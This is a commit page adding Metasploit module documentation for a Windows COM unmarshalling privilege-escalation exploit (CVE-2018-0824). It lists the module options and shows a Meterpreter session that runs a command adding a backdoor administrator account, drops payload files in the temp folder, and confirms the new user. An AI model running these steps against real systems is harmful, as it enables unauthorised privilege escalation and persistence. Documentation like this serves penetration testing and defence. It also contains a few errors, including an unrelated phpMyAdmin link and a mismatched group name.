dnrops
/
metasploit-framework
1
0
Fork 0
Code Issues Pull Requests Packages Projects Releases Wiki Activity

Adding documentation 

As there was no escalate folder I have created one to maintain my documentation, kindly suggest if any issues.
This commit is contained in:
7echSec 2018-08-30 21:13:33 +05:30 committed by GitHub
parent 0aac9a4881
commit 9f13d0fc56
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 111 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

111
documentation/modules/post/windows/escalate/unmarshal.md Normal file
View File

@ -0,0 +1,111 @@
## Overview
This is a post exploitation module for local privilege escalation bug which exists in Microsoft COM for windows when it fails to properly handle serialized objects.
* https://www.phpmyadmin.net/downloads/
* https://github.com/codewhitesec/UnmarshalPwn/
* https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-0824
## Module Options
"POCCMD" This command will be executed on successful exploitation.</br>
"SESSION" The session to run this module on.
## Limitations
The payload will not spawn ant independent session it simply creates process with the system privilege.
If the system is not vulnerable, then payload will execute but new process will not spawn.
## Verification steps
If you want to confirm the vulnerability before you add user or perform any other sensitive action.
1. `set POCCMD /s notepad.exe`
2. `run`
Confirmation:
Then go to meterpreter session and confirm running process (ps)
If you see notepad.exe running as SYSYEM then that is as indication of vulnerable system.
## Usage
```
meterpreter > getuid
Server username: PC2\test
meterpreter > sysinfo
Computer : PC2
OS : Windows 10 (Build 17134).
Architecture : x64
System Language : en_US
Domain : PSS
Logged On Users : 12
Meterpreter : x64/windows
meterpreter > background
[*] Backgrounding session 2...
msf > use post/windows/escalate/unmarshal
msf post(windows/escalate/unmarshal) > show options
Module options (post/windows/escalate/unmarshal):
Name Current Setting
---- ---------------
POCCMD /k net user msfuser msfpass /add && net localgroup administrators msf /add
READFILE c:\boot.ini
SESSION
msf post(windows/escalate/unmarshal) > set session 2
msf post(windows/escalate/unmarshal) > run
[!] SESSION may not be compatible with this module.
[*] exe name is: oQT0yWT834.exe
[*] poc name is: sJ76Il3UGj.sct
[*] Reading Payload from file /usr/share/metasploit-framework/data/exploits/CVE-2018-0824/UnmarshalPwn.exe
[!] writing to %TEMP%
[+] Persistent Script written to C:\Users\test\AppData\Local\Temp\oQT0yWT834.exe
[*] Reading Payload from file /usr/share/metasploit-framework/data/exploits/CVE-2018-0824/poc_header
[!] writing to %TEMP%
[+] Persistent Script written to C:\Users\test\AppData\Local\Temp\sJ76Il3UGj.sct
[*] Reading Payload from file /usr/share/metasploit-framework/data/exploits/CVE-2018-0824/poc_footer
[*] Starting module...
[*] Location of UnmarshalPwn.exe is: C:\Users\test\AppData\Local\Temp\oQT0yWT834.exe
[*] Location of poc.sct is: C:\Users\test\AppData\Local\Temp\sJ76Il3UGj.sct
[*] Executing command : C:\Users\test\AppData\Local\Temp\oQT0yWT834.exe C:\Users\test\AppData\Local\Temp\sJ76Il3UGj.sct
Query for IStorage
Call: Stat
End: Stat
Query for IMarshal
Call: GetMarshalSizeMax
Unknown IID: {ECC8691B-C1DB-4DC0-855E-65F6C551AF49} 0000020CA320CDB0
Query for IMarshal
Call: GetUnmarshalClass
Call: GetMarshalSizeMax
Call: MarshalInterface
[*] Post module execution completed
Confirmation
Back in Meterpreter Session
meterpreter > shell
Process 3936 created.
Channel 185 created.
Microsoft Windows [Version 10.0.17134.1]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\temp\un>net user
net user
User accounts for \\PC2
-------------------------------------------------------------------------------
Administrator DefaultAccount Guest
User msfuser sshd
sshd_server test WDAGUtilityAccount
The command completed successfully.